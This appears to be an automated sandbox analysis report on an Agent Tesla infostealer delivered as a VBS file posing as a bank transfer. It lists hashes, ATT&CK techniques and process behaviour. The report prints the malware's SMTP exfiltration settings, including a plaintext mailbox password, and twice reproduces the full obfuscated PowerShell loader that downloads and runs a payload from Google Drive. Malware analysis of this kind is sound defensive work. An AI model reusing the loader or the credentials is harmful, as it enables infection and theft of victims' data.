agenttesla | be4b7116fa1243c9ad977381f3301854cca00273f968881bdf87c8e6777dca32

General

Target

r20240913TRANSFERENCIA.vbs
Size

96KB
MD5

6189a9d977994601ef954a1a146e8d8d
SHA1

93c638448ad65e7b005fa7c4527786e5462b05f2
SHA256

be4b7116fa1243c9ad977381f3301854cca00273f968881bdf87c8e6777dca32
SHA512

21d6b94be5fdb9e65b77e22de584cbad6ec3cd751f28dc478bee1d74c686538d5ef7038d8293d3d704547df871bead4cfe4a14ee52bac59124b685040b82326d
SSDEEP

3072:7LoqFwl872xHXYxo12gEzZPQxMQuh7q+UUdwnu3:Y0wq72NMokdzZaDuhe+UAl

Score

10^/10

agenttesla discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
smtp.yandex.com
Port:
587
Username:
[email protected]
Password:
marcellinus360

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.yandex.com
Port:
587
Username:
[email protected]
Password:
marcellinus360
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 9 IoCs

flow	pid	Process
8	4740	powershell.exe
10	4740	powershell.exe
35	1044	msiexec.exe
37	1044	msiexec.exe
39	1044	msiexec.exe
41	1044	msiexec.exe
44	1044	msiexec.exe
59	1044	msiexec.exe
62	1044	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4740	powershell.exe
1368	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
8	drive.google.com
35	drive.google.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
58	api.ipify.org
59	api.ipify.org

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4740	powershell.exe
1368	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1044	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1368	powershell.exe
1044	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
4740	powershell.exe
4740	powershell.exe
1368	powershell.exe
1368	powershell.exe
1368	powershell.exe
1044	msiexec.exe
1044	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1368	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeDebugPrivilege	1368	powershell.exe
Token: SeDebugPrivilege	1044	msiexec.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3684 wrote to memory of 4740	3684	WScript.exe	86
PID 3684 wrote to memory of 4740	3684	WScript.exe	86
PID 1368 wrote to memory of 1044	1368	powershell.exe	100
PID 1368 wrote to memory of 1044	1368	powershell.exe	100
PID 1368 wrote to memory of 1044	1368	powershell.exe	100
PID 1368 wrote to memory of 1044	1368	powershell.exe	100

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\r20240913TRANSFERENCIA.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfLaflyO K iBFurbaForsLPer :Bestc PerU .roBKessbSvalityktEPavls eh=circnEme,eBenvwPro -AskoO inbF rnJV nbEHo ecRealtChec UngSS umyLnu sRe.rtHarpe dypM Lic.DiddnOmbueS mmtre i.Che W ewETil BUndeC AnbLVaryiL.ureResenAcrotSkat ');Crustaceology ($Gennemboring);Crustaceology (Virksomhedskategoris 'dus $AnodCVersuSulpb PribF,rmiTurneNedasFred.ConsHlgeueTotaaDepodGutsetmmerDamns.upe[Ansv$BehnHJur.jSperlSkifpoutseManimPsykeK ytnMic uGa,geVildnCrim]stjn=Krlh$ NimATorta PrerL,ndsMulttSporaForsl alusRiorlAfriiSompsTilftLaseeAktirSi esM lo ');$Sampson=Virksomhedskategoris ' In,$TermCSka.uBoi.bSatybPrepiAfmaeSal.sOver. ,enD.riloJ bswBugmn H rlNondoSch a Sl.d odFPhosiB nkla umeVold( ong$BranSDa,atNoumo A tlVenteSalut ,ls1.hyt1 pec1Visk,Efte$MaskPFiskoFllel edyDec,sCambo SlirStavbHercaVestt IneeTykm) an ';$Polysorbate=$Sandes;Crustaceology (Virksomhedskategoris 'ta a$ ubtguforlMa iOL.gabD sca KunlDv,g: FrenPl,yUileuMAngeM BevUCod.SChat1Fo.n2Hold9Peri= Gen(GuraTchr eTillST.ckTSoot-L vrPCutwaPlonTKreahVels oci$Op,rPFaa,oKontLNic.YTyresP jlOTyporWheaBadiaaLi htNo je isc)G er ');while (!$Nummus129) {Crustaceology (Virksomhedskategoris 'Diop$FrasgFedtl.rono Repb kkvaSnaglDkni: rosP Of hProxoRes t.kjooTaurmUsdeaDigngfrihn F,deUn mtPseui r bsLocam.yri= ,us$LinutTr,urSaunudisweOver ') ;Crustaceology $Sampson;Crustaceology (Virksomhedskategoris 'Til S UnitLa paObelr A ttPeri- a tS ,jolLrdaeA beeVek pMor. Pent4 E.s ');Crustaceology (Virksomhedskategoris 're n$BebugH aslLibeoAbdobMuraa Pe,lC ru:G nsNTikkuBacim ensm StauMarks E i1fik.2P.ae9Elde= Fri(Ho fTAlleesy tsBidst ges-HagePNihiaUpbbtGagghAm u Seck$Ant.PToppoSotilBefoyUndis entoResprTimebMayoaTopit BeteToba) one ') ;Crustaceology (Virksomhedskategoris ' stn$Sgesg,nfalPersoC,osbDrosaFlitlejen:LuftSModelEfteoKarlw RanfCharoMis.x ,rde Re r yvt=Po,t$Di,hgMedelBabyoOph b NefaDilllForb: D,nfvagroRottlCan k aaePlurkOverr mog+ be.+Opse% She$ MunSDislnBecuuBonedGuldeTa esSparkC.opaF,brfTim tCloceEgoitVe,msCirc.Hy,ocArcaoAdmiuAdlin BaltIman ') ;$Stolet111=$Snudeskaftets[$Slowfoxer];}$Relinquishers=275628;$Henvejres=30508;Crustaceology (Virksomhedskategoris 'Q,in$ Jo gTranlPl.toHetebAfsbaD cil B n:Fiskd LitePrelmSystiAfgitSegmrCoo aProliGenenDybd Tsi=Regr wagG Pree Burt E a-TranCEmbro.unenLagrt.ewseRatanPeckt ac Tops$CullPMe lo H plOzony .ntsD stoDe orMejsbRe.saE tetBlode eco ');Crustaceology (Virksomhedskategoris 'Bort$PatrgCordlMunioFedebVsenaThorlStil:UndsT Pl,rMerpiPurtcTe.ru SyvsKulmpKal i Uigd BehaCh ntVan,eLo s D av= Kam Ac.e[Hed.S ariyOmnosMa,otPaase TemmSmun.SnylCryg.oEubtnBallvGavleM.lercasst Ska]Hnde:Chee: SkuFT lsrKommoE lamTilrB,ladaObsescente ing6 Bjr4 alpSForst,ptrr aneiUnd.nMadogMoms(Unso$Torkd oddeHrelmBladi tiktDiapr laga VeriForhnnow )B au ');Crustaceology (Virksomhedskategoris ' ol$ BesgScrelB rgoThrobStudast alForn:YppeKRi eoundevNat e E.snLa.adFor.i isknS.ragIn fe Andn ravsAn,r Dann=Seni Adst[telmS MasyUdstsD ritShyfeDioimlun,.F reTChefeDirexRoust Ma,.chamEPasqnNyspcOxteo R wdCit iorannRe,egpass]Inds: er:DecoAFlekSGam CD oeIBuckIfler.G liGPlaseg,ootpe iSSluptArisrFormiForunRe ngArme(Arki$ venT ortrTailiTilsc,taguE.orsAggrpInfeiBarkdGiftaAzimtLaste Tus)Elec ');Crustaceology (Virksomhedskategoris 'T kk$WullgO.erlArgyoH ptbA tiaWan.lTurn:AminMKat itheosWaigoSurtmSamlaOpertEmbrhpard1Bevi9D st0 Ant=Oran$T ecK PepoAbb vForbeMos nF,dedWardiekspnGullgAnt e orn cobs,eel.Trics nciuCannb EsosbusttpickrUds.i obln .ergCirk( Con$ErytRFamieBemelOv ri.espnF rsq lviu Preiincrs Co.h SmrefritrBailsT gn, ss$teatHpolleTrannLysev.ible UnwjMentr ForeCei,sSphe)smul ');Crustaceology $Misomath190;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfLaflyO K iBFurbaForsLPer :Bestc PerU .roBKessbSvalityktEPavls eh=circnEme,eBenvwPro -AskoO inbF rnJV nbEHo ecRealtChec UngSS umyLnu sRe.rtHarpe dypM Lic.DiddnOmbueS mmtre i.Che W ewETil BUndeC AnbLVaryiL.ureResenAcrotSkat ');Crustaceology ($Gennemboring);Crustaceology (Virksomhedskategoris 'dus $AnodCVersuSulpb PribF,rmiTurneNedasFred.ConsHlgeueTotaaDepodGutsetmmerDamns.upe[Ansv$BehnHJur.jSperlSkifpoutseManimPsykeK ytnMic uGa,geVildnCrim]stjn=Krlh$ NimATorta PrerL,ndsMulttSporaForsl alusRiorlAfriiSompsTilftLaseeAktirSi esM lo ');$Sampson=Virksomhedskategoris ' In,$TermCSka.uBoi.bSatybPrepiAfmaeSal.sOver. ,enD.riloJ bswBugmn H rlNondoSch a Sl.d odFPhosiB nkla umeVold( ong$BranSDa,atNoumo A tlVenteSalut ,ls1.hyt1 pec1Visk,Efte$MaskPFiskoFllel edyDec,sCambo SlirStavbHercaVestt IneeTykm) an ';$Polysorbate=$Sandes;Crustaceology (Virksomhedskategoris 'ta a$ ubtguforlMa iOL.gabD sca KunlDv,g: FrenPl,yUileuMAngeM BevUCod.SChat1Fo.n2Hold9Peri= Gen(GuraTchr eTillST.ckTSoot-L vrPCutwaPlonTKreahVels oci$Op,rPFaa,oKontLNic.YTyresP jlOTyporWheaBadiaaLi htNo je isc)G er ');while (!$Nummus129) {Crustaceology (Virksomhedskategoris 'Diop$FrasgFedtl.rono Repb kkvaSnaglDkni: rosP Of hProxoRes t.kjooTaurmUsdeaDigngfrihn F,deUn mtPseui r bsLocam.yri= ,us$LinutTr,urSaunudisweOver ') ;Crustaceology $Sampson;Crustaceology (Virksomhedskategoris 'Til S UnitLa paObelr A ttPeri- a tS ,jolLrdaeA beeVek pMor. Pent4 E.s ');Crustaceology (Virksomhedskategoris 're n$BebugH aslLibeoAbdobMuraa Pe,lC ru:G nsNTikkuBacim ensm StauMarks E i1fik.2P.ae9Elde= Fri(Ho fTAlleesy tsBidst ges-HagePNihiaUpbbtGagghAm u Seck$Ant.PToppoSotilBefoyUndis entoResprTimebMayoaTopit BeteToba) one ') ;Crustaceology (Virksomhedskategoris ' stn$Sgesg,nfalPersoC,osbDrosaFlitlejen:LuftSModelEfteoKarlw RanfCharoMis.x ,rde Re r yvt=Po,t$Di,hgMedelBabyoOph b NefaDilllForb: D,nfvagroRottlCan k aaePlurkOverr mog+ be.+Opse% She$ MunSDislnBecuuBonedGuldeTa esSparkC.opaF,brfTim tCloceEgoitVe,msCirc.Hy,ocArcaoAdmiuAdlin BaltIman ') ;$Stolet111=$Snudeskaftets[$Slowfoxer];}$Relinquishers=275628;$Henvejres=30508;Crustaceology (Virksomhedskategoris 'Q,in$ Jo gTranlPl.toHetebAfsbaD cil B n:Fiskd LitePrelmSystiAfgitSegmrCoo aProliGenenDybd Tsi=Regr wagG Pree Burt E a-TranCEmbro.unenLagrt.ewseRatanPeckt ac Tops$CullPMe lo H plOzony .ntsD stoDe orMejsbRe.saE tetBlode eco ');Crustaceology (Virksomhedskategoris 'Bort$PatrgCordlMunioFedebVsenaThorlStil:UndsT Pl,rMerpiPurtcTe.ru SyvsKulmpKal i Uigd BehaCh ntVan,eLo s D av= Kam Ac.e[Hed.S ariyOmnosMa,otPaase TemmSmun.SnylCryg.oEubtnBallvGavleM.lercasst Ska]Hnde:Chee: SkuFT lsrKommoE lamTilrB,ladaObsescente ing6 Bjr4 alpSForst,ptrr aneiUnd.nMadogMoms(Unso$Torkd oddeHrelmBladi tiktDiapr laga VeriForhnnow )B au ');Crustaceology (Virksomhedskategoris ' ol$ BesgScrelB rgoThrobStudast alForn:YppeKRi eoundevNat e E.snLa.adFor.i isknS.ragIn fe Andn ravsAn,r Dann=Seni Adst[telmS MasyUdstsD ritShyfeDioimlun,.F reTChefeDirexRoust Ma,.chamEPasqnNyspcOxteo R wdCit iorannRe,egpass]Inds: er:DecoAFlekSGam CD oeIBuckIfler.G liGPlaseg,ootpe iSSluptArisrFormiForunRe ngArme(Arki$ venT ortrTailiTilsc,taguE.orsAggrpInfeiBarkdGiftaAzimtLaste Tus)Elec ');Crustaceology (Virksomhedskategoris 'T kk$WullgO.erlArgyoH ptbA tiaWan.lTurn:AminMKat itheosWaigoSurtmSamlaOpertEmbrhpard1Bevi9D st0 Ant=Oran$T ecK PepoAbb vForbeMos nF,dedWardiekspnGullgAnt e orn cobs,eel.Trics nciuCannb EsosbusttpickrUds.i obln .ergCirk( Con$ErytRFamieBemelOv ri.espnF rsq lviu Preiincrs Co.h SmrefritrBailsT gn, ss$teatHpolleTrannLysev.ible UnwjMentr ForeCei,sSphe)smul ');Crustaceology $Misomath190;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1368
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

Query Registry

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4ff23c124ae23955d34ae2a7306099a

SHA1
b814e3331a09a27acfcd114d0c8fcb07957940a3

SHA256
1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

SHA512
f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w5m1kstg.yy2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Nonpunctuating.sem

Filesize
398KB

MD5
16c143ca49e7146c80dc68bbf23ae6e1

SHA1
e62e4cebad7844465b3b91a26b00e2a3ad3adc05

SHA256
a4d0b0620550854cfd0c2f78ad64372fe54c28268402e0c1c195efc9df2c8630

SHA512
c1080c102e5cacceb7e57548fe0cb9f8e121076c42a22c8ee022ca2672607d08f29bf2aa684cbba1763badfdd940955d3b47aad20ffa7b260e6f3b2473783264

Download Submit
memory/1044-66-0x0000000022680000-0x000000002268A000-memory.dmp

Filesize
40KB

Download
memory/1044-65-0x00000000225D0000-0x0000000022662000-memory.dmp

Filesize
584KB

Download
memory/1044-64-0x0000000021E90000-0x0000000021F2C000-memory.dmp

Filesize
624KB

Download
memory/1044-63-0x0000000021DA0000-0x0000000021DF0000-memory.dmp

Filesize
320KB

Download
memory/1044-61-0x0000000000800000-0x0000000000840000-memory.dmp

Filesize
256KB

Download
memory/1044-60-0x0000000000800000-0x0000000001A54000-memory.dmp

Filesize
18.3MB

Download
memory/1368-45-0x00000000085F0000-0x0000000008B94000-memory.dmp

Filesize
5.6MB

Download
memory/1368-41-0x00000000079C0000-0x000000000803A000-memory.dmp

Filesize
6.5MB

Download
memory/1368-23-0x0000000004B90000-0x0000000004BC6000-memory.dmp

Filesize
216KB

Download
memory/1368-24-0x0000000005330000-0x0000000005958000-memory.dmp

Filesize
6.2MB

Download
memory/1368-25-0x00000000052A0000-0x00000000052C2000-memory.dmp

Filesize
136KB

Download
memory/1368-26-0x00000000059D0000-0x0000000005A36000-memory.dmp

Filesize
408KB

Download
memory/1368-27-0x0000000005A40000-0x0000000005AA6000-memory.dmp

Filesize
408KB

Download
memory/1368-33-0x0000000005B30000-0x0000000005E84000-memory.dmp

Filesize
3.3MB

Download
memory/1368-47-0x0000000008BA0000-0x000000000AB80000-memory.dmp

Filesize
31.9MB

Download
memory/1368-39-0x0000000006160000-0x000000000617E000-memory.dmp

Filesize
120KB

Download
memory/1368-40-0x0000000006190000-0x00000000061DC000-memory.dmp

Filesize
304KB

Download
memory/1368-44-0x0000000007370000-0x0000000007392000-memory.dmp

Filesize
136KB

Download
memory/1368-42-0x00000000066F0000-0x000000000670A000-memory.dmp

Filesize
104KB

Download
memory/1368-43-0x00000000073E0000-0x0000000007476000-memory.dmp

Filesize
600KB

Download
memory/4740-22-0x00007FFFC1320000-0x00007FFFC1DE1000-memory.dmp

Filesize
10.8MB

Download
memory/4740-0-0x00007FFFC1323000-0x00007FFFC1325000-memory.dmp

Filesize
8KB

Download
memory/4740-18-0x00007FFFC1320000-0x00007FFFC1DE1000-memory.dmp

Filesize
10.8MB

Download
memory/4740-19-0x00007FFFC1320000-0x00007FFFC1DE1000-memory.dmp

Filesize
10.8MB

Download
memory/4740-16-0x00007FFFC1320000-0x00007FFFC1DE1000-memory.dmp

Filesize
10.8MB

Download
memory/4740-15-0x00007FFFC1320000-0x00007FFFC1DE1000-memory.dmp

Filesize
10.8MB

Download
memory/4740-14-0x00007FFFC1323000-0x00007FFFC1325000-memory.dmp

Filesize
8KB

Download
memory/4740-12-0x00007FFFC1320000-0x00007FFFC1DE1000-memory.dmp

Filesize
10.8MB

Download
memory/4740-11-0x00007FFFC1320000-0x00007FFFC1DE1000-memory.dmp

Filesize
10.8MB

Download
memory/4740-1-0x0000015EEF5F0000-0x0000015EEF612000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads